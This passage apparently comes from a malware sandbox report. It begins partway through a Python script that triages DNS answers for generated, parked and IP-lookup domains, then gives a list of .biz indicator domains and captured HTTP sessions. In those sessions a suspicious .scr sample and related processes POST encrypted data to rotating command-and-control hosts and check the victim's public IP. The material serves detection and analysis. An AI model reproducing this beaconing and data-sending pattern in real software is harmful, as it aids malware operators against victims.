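# Hosts the report lists; both are public-IP / geolocation lookup services.
GEO_LOOKUP_HOSTS = {"reallyfreegeoip.org", "checkip.dyndns.org"}
# CNAME targets observed in the report's answers; both are domain-parking services.
PARKING_SUFFIXES = (".bodis.com", ".parkingcrew.net")
NXDOMAIN = 3  # DNS RCODE 3, shown as "Name error (3)" in the report

# Constructed sample input: a subset of the report's rows, simplified to
# "time trans_id rcode name answer type" (answer is "none" on NXDOMAIN).
SAMPLE_ROWS = """\
12:57:11.061639071 0xf478 0 reallyfreegeoip.org 104.21.80.1 A
12:57:11.904395103 0x1d8a 0 npukfztj.biz 44.221.84.105 A
12:57:12.885632038 0x4a3 0 przvgke.biz 72.52.178.23 A
12:57:13.613821030 0x3 0 ww7.przvgke.biz 76899.bodis.com CNAME
12:57:13.613821030 0x3 0 76899.bodis.com 199.59.243.228 A
12:57:15.958900928 0xc0ed 3 zlenh.biz none A
12:57:15.996045113 0x6f9a 0 knjghuig.biz 18.141.10.107 A
12:57:18.801728010 0x44db 3 uhxqin.biz none A
12:57:44.419126987 0xb548 0 ssbzmoy.biz 18.141.10.107 A
12:57:49.273724079 0x3efc 0 ww12.przvgke.biz 084725.parkingcrew.net CNAME
12:57:49.273724079 0x3efc 0 084725.parkingcrew.net 76.223.26.96 A
12:58:48.810899019 0xc69f 0 vcddkls.biz 18.141.10.107 A
"""


@dataclass(frozen=True)
class DnsAnswer:
    time: str
    trans_id: int
    rcode: int
    name: str
    answer: str  # IPv4 address, CNAME target, or "none" for a failed lookup
    rtype: str


def parse_rows(text: str) -> list[DnsAnswer]:
    """Parse the simplified six-column rows; malformed lines are skipped."""
    answers = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        t, tid, rcode, name, answer, rtype = parts
        answers.append(DnsAnswer(t, int(tid, 16), int(rcode), name.lower(), answer.lower(), rtype))
    return answers


def registered_domain(host: str) -> str:
    # Assumption: two-label registered domains (foo.biz); sufficient for this report.
    return ".".join(host.split(".")[-2:])


def vowel_ratio(label: str) -> float:
    return sum(c in "aeiou" for c in label) / max(len(label), 1)


def looks_generated(domain: str) -> bool:
    """Editor's heuristic: a short, all-letter .biz label with few vowels."""
    sld, tld = domain.split(".")[-2:]
    return tld == "biz" and re.fullmatch(r"[a-z]{5,9}", sld) is not None and vowel_ratio(sld) <= 0.34


def triage(answers: list[DnsAnswer]) -> dict:
    nxdomain, geo, parked = set(), set(), {}
    domains_by_ip = defaultdict(set)
    for a in answers:
        if a.rcode == NXDOMAIN:
            nxdomain.add(a.name)
            continue
        if a.rtype == "CNAME" and a.answer.endswith(PARKING_SUFFIXES):
            parked[a.name] = a.answer  # sinkholed / unregistered-looking C2 candidate
        if a.rtype == "A":
            domains_by_ip[a.answer].add(registered_domain(a.name))
        if registered_domain(a.name) in GEO_LOOKUP_HOSTS:
            geo.add(a.name)  # external IP / country check, a common sandbox-evasion step
    # Several unrelated registered domains on one address is a stronger signal than any one name.
    shared_ip = {ip: sorted(d) for ip, d in domains_by_ip.items() if len(d) >= 2}
    generated = sorted({registered_domain(a.name) for a in answers
                        if looks_generated(registered_domain(a.name))})
    return {"nxdomain": sorted(nxdomain), "parked": parked, "shared_ip": shared_ip,
            "geo_lookups": sorted(geo), "generated": generated}


if __name__ == "__main__":
    for key, value in triage(parse_rows(SAMPLE_ROWS)).items():
        print(f"{key}: {value}")
```

On the sample rows the output groups knjghuig.biz, ssbzmoy.biz and vcddkls.biz under 18.141.10.107, lists both ww7/ww12 hosts as parked, and reports zlenh.biz and uhxqin.biz as NXDOMAIN; feeding it the full table above widens the shared-address clusters (44.221.84.105, 54.244.188.177, 82.112.184.197) in the same way.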
• reallyfreegeoip.org
• pywolwnvd.biz
• ssbzmoy.biz
• checkip.dyndns.org
• cvgrf.biz
• npukfztj.biz
• przvgke.biz
• ww7.przvgke.biz
• knjghuig.biz
• lpuegx.biz
• ww12.przvgke.biz
• vjaxhpbji.biz
• xlfhhhm.biz
• ifsaia.biz
• saytjshyf.biz
• vcddkls.biz
• fwiwk.biz
• ww12.fwiwk.biz
• ww7.fwiwk.biz
• tbjrpv.biz
• deoci.biz
• gytujflc.biz
• qaynky.biz
• bumxkqgxu.biz
• dwrqljrr.biz
• nqwjmb.biz
• ytctnunms.biz
• myups.biz
• oshhkdluh.biz
• yunalwv.biz
• jpskm.biz
• lrxdmhrr.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 54.244.188.177 | 80 | 3632 | C:\Users\user\Desktop\PO#_1100015533.scr
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:07.669348955 CET | 348 | OUT | POST /crs HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 808
Jan 15, 2025 12:57:07.669388056 CET | 808 | OUT | Data Raw: 8d 8a e3 d9 24 2b 10 63 1c 03 00 00 67 6a 75 d0 ca f7 02 0c 7d d3 63 7a 8a f0 cf 95 a4 fd 5c 2b e4 5b 27 62 bb 05 5d 9f 5b 06 da 08 4a 0e fa 93 3b 74 a2 c1 67 7d ce db 9d 60 7c 44 6b 47 0c 69 5b c3 9a 12 55 8f 21 2e 3b 50 92 c3 e9 c6 f0 af 4c c1
    Data Ascii: $+cgju}cz\+['b][J;tg}`|DkGi[U!.;PL53zTK4jR{){IwVE;|m=3zi)p=Rp8BZ%y\gd3"c6k^D9a`B574p5'K-#@'v[pw
Jan 15, 2025 12:57:08.335462093 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:57:08 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d9438afd4d1b93ab295437df75ab987c|8.46.123.189|1736942228|1736942228|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49164 | 54.244.188.177 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:07.710762978 CET | 355 | OUT | POST /xvuqxulkih HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:57:07.710783958 CET | 850 | OUT | Data Raw: 58 ab 5e af 34 2d dc 70 46 03 00 00 12 94 5f 5a 10 28 b4 40 13 ef 1d 79 5a 15 e9 cc f5 7e 54 89 9b 29 02 53 da 5e 81 6b d1 9f 3b 4a ae 6d f0 1d 17 3d cf 9c 55 e2 72 8b 14 ff 99 41 0d 59 56 5b a7 d3 20 19 cc a8 af 00 95 7d cc 4a 7f 46 d8 ed f6 8e
    Data Ascii: X^4-pF_Z(@yZ~T)S^k;Jm=UrAYV[ }JF&J{nN-#|{VQwPkgI*E}HF@Fg5<bz`nZe_\&B\s*.,f)80$C_3VJ;A{$
Jan 15, 2025 12:57:08.390084028 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:57:08 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2c202ab3e08a42c7f87abb610ca036d7|8.46.123.189|1736942228|1736942228|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 18.141.10.107 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:08.827080965 CET | 359 | OUT | POST /bjyjakehonafotkd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:57:08.827114105 CET | 850 | OUT | Data Raw: df ae f9 a1 00 0e d5 5a 46 03 00 00 f5 7c 4c 21 18 3f 78 25 4a 1d 76 45 00 af cb 6b 51 ab 4d 06 87 03 82 8c 81 1c 3c 0c 09 a0 1b d5 e2 9e 42 01 8f be 98 49 e2 34 66 a1 a0 7a d1 59 c0 8f 44 e7 2a 10 48 36 e4 14 6a 0f 6f 26 aa 83 56 fd 2a 94 1a 7b
    Data Ascii: ZF|L!?x%JvEkQM<BI4fzYD*H6jo&V*{Q@B*l8;D!.=7`4GM9;7=tj&Bb@kjrk(gsA~a'#r8!VWJ$xCwes?$I}:
Jan 15, 2025 12:57:10.202420950 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:57:09 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=514b3fad1203dadb53751553cb78a532|8.46.123.189|1736942229|1736942229|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49166 | 193.122.130.0 | 80 | 3800 | C:\Users\user\AppData\Local\Temp\Microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:09.321055889 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 15, 2025 12:57:09.794862986 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Wed, 15 Jan 2025 11:57:09 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 6a993c096f2264a0db21145c23fa4cee
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.003750086 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:09 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Request-ID: 6a993c096f2264a0db21145c23fa4cee
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.838721037 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.938925028 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:10 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Request-ID: 58ed4e033e2be769380a549f688a2553
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.148611069 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:10 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Request-ID: 58ed4e033e2be769380a549f688a2553
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.22  49167        54.244.188.177  80                3728  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 15, 2025 12:57:10.714670897 CET  348                OUT        POST /mlvmnwk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Jan 15, 2025 12:57:10.714715004 CET  850                OUT        Data Raw: 26 f8 f7 87 5b c5 88 2e 46 03 00 00 8c 2e 8e 11 9e 6f af 8d 77 86 27 ff e7 cc 23 40 d3 ec 80 f3 6c 4e be b4 98 4a 80 11 88 20 16 d4 c4 b2 84 82 b9 35 f9 9c a5 39 38 08 6e 9c 6d 8e 58 23 78 91 78 f7 ea 76 d7 d0 4c 96 2d 69 ec ea c4 42 f4 ef 1a 40
Data Ascii: &[.F.ow'#@lNJ 598nmX#xxvL-iB@Yf/m3(q2x`;g$;:6G)FyqnI!<y@e{(w5-V=Y7#8=g"YkI_ZR2v?5Uj!Xh{.GzEP<
Jan 15, 2025 12:57:11.427480936 CET  409                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 Jan 2025 11:57:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8169c19d3eb0d3025fd06f8c9fc04bcf|8.46.123.189|1736942231|1736942231|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.22  49169        44.221.84.105   80                3728  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 15, 2025 12:57:11.915673971 CET  352                OUT        POST /uxiijwub HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Jan 15, 2025 12:57:11.915673971 CET  850                OUT        Data Raw: 78 1c 0d 4f 37 a7 4d 25 46 03 00 00 b1 39 8e 86 39 96 08 ea d5 82 0c 73 b3 3b 8f a0 69 8b f1 1e 09 69 76 41 ed 3c 29 7d ea 40 fe 07 89 9f 00 25 31 e1 ad ca ff fe 4a 3a aa e3 98 71 b9 13 17 7c 1a e8 8e cb c9 16 6a c4 04 cf d9 9c 26 a4 f8 eb 84 22
Data Ascii: xO7M%F99s;iivA<)}@%1J:q|j&"&.P&jTem9*KoLcr[&[}$l+#&n6GPry`yjvm5qiTbL0lf6NpFWZ]P^cQ@
Jan 15, 2025 12:57:12.382141113 CET  412                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 Jan 2025 11:57:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dab28b608274ebec0a7fda0e1ac64670|8.46.123.189|1736942232|1736942232|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.22  49170        72.52.178.23    80                3728  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 15, 2025 12:57:12.929582119 CET  345                OUT        POST /of HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Jan 15, 2025 12:57:12.929615021 CET  850                OUT        Data Raw: d1 85 f3 b7 33 9a 42 63 46 03 00 00 7d 58 1b d6 4c 5a 3d cb 7c 35 db cc cb bd 8f a5 84 84 3d a1 23 6c 4c 0d 08 39 f3 12 a1 fa 1c 3e 4c 3f 3d 35 2f 3c 21 a9 fc 13 7f be 01 39 ba 8c 6d c3 c5 1e ed 58 d2 c4 46 ed 5b a2 ab e7 9a ee 0d 98 0b 1d 12 68
Data Ascii: 3BcF}XLZ=|5=#lL9>L?=5/<!9mXF[hxc1ctv{+LEw 65dQ"=6h0aJya7(|Gt?-5=Y#%7YWON=p_Lw0]S[m)
Jan 15, 2025 12:57:13.485886097 CET  276                IN         HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:57:13 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww7.przvgke.biz/of?usid=20&utid=14164916598
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.590998888 CET359OUTPOST /tbjnflaqienlofab HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.591046095 CET850OUTData Raw: 6f 6c 14 70 ce 13 1a b3 46 03 00 00 1f 26 5b 29 2c 00 cb 9c 98 c8 51 5e 25 6f 1b 79 59 c9 cb 42 3b 31 c5 0d 5b 5e 13 6b 7f e1 7c b4 71 11 0b a4 29 b4 4b cf 2e eb 32 79 e3 36 e2 35 41 b0 9f 53 ce 84 27 ae 64 e0 a4 e9 40 90 09 b2 04 c1 34 61 3d 33
                                                                                                                                                                                                                                                                        Data Ascii: olpF&[),Q^%oyYB;1[^k|q)K.2y65AS'd@4a=3Gn8rbRJte7oS9^8Nuw}oJZGFKgZD2fUc`ys|GzF0j}d^#oIfB<o+=0>F`BBB
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.747982025 CET290INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/tbjnflaqienlofab?usid=20&utid=14164917114
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.992872000 CET290INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/tbjnflaqienlofab?usid=20&utid=14164917114
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49171 | 199.59.243.228 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:14.160757065 CET | 352 | OUT | GET /of?usid=20&utid=14164916598 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww7.przvgke.biz
Jan 15, 2025 12:57:14.636079073 CET | 1236 | IN | HTTP/1.1 200 OK
date: Wed, 15 Jan 2025 11:57:13 GMT
content-type: text/html; charset=utf-8
content-length: 1130
x-request-id: 0a808586-8109-4722-9577-571f8d3c78d9
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_o9zahp2cR69YCvZyckUXGf40j7HkCcio8ytXTRK0TTaBNS8ydemdiX4tmzdr6hpAdVEOr+fCXcb56gZW3Vwnuw==
set-cookie: parking_session=0a808586-8109-4722-9577-571f8d3c78d9; expires=Wed, 15 Jan 2025 12:12:14 GMT; path=/
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 39 7a 61 68 70 32 63 52 36 39 59 43 76 5a 79 63 6b 55 58 47 66 34 30 6a 37 48 6b 43 63 69 6f 38 79 74 58 54 52 4b 30 54 54 61 42 4e 53 38 79 64 65 6d 64 69 58 34 74 6d 7a 64 72 36 68 70 41 64 56 45 4f 72 2b 66 43 58 63 62 35 36 67 5a 57 33 56 77 6e 75 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_o9zahp2cR69YCvZyckUXGf40j7HkCcio8ytXTRK0TTaBNS8ydemdiX4tmzdr6hpAdVEOr+fCXcb56gZW3Vwnuw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jan 15, 2025 12:57:14.636101007 CET | 564 | IN | Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGE4MDg1ODYtODEwOS00NzIyLTk1NzctNTcxZjhkM2M3OGQ5IiwicGFnZV90aW1lIjoxNzM2OTQyMjM0LCJwYWdlX3VybCI6I
Jan 15, 2025 12:57:15.774323940 CET | 366 | OUT | GET /tbjnflaqienlofab?usid=20&utid=14164917114 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
